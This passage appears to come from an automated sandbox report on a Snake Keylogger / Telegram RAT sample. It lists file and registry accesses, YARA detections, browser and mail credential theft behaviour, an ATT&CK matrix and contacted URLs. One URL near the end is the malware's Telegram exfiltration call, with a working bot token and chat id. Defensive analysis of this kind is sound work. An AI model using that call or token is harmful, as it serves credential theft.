Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Queries volume information: C:\Users\user\Desktop\rPO0977-6745.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Queries volume information: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Queries volume information: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\rPO0977-6745.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.3693041192.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3693243826.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3693243826.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3693041192.00000000029EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3693243826.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EDyxAgkldisLe.exe PID: 8004, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EDyxAgkldisLe.exe PID: 8004, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\rPO0977-6745.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EDyxAgkldisLe.exe PID: 8004, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.3693041192.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3693243826.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3693243826.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3693041192.00000000029EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3693243826.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EDyxAgkldisLe.exe PID: 8004, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EDyxAgkldisLe.exe PID: 8004, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	31 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
rPO0977-6745.exe	45%	ReversingLabs	Win32.Trojan.Generic
rPO0977-6745.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	45%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake	0%	Avira URL Cloud	safe
http://microsoft.co	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
http://checkip.dyndns.orgh	0%	Avira URL Cloud	safe
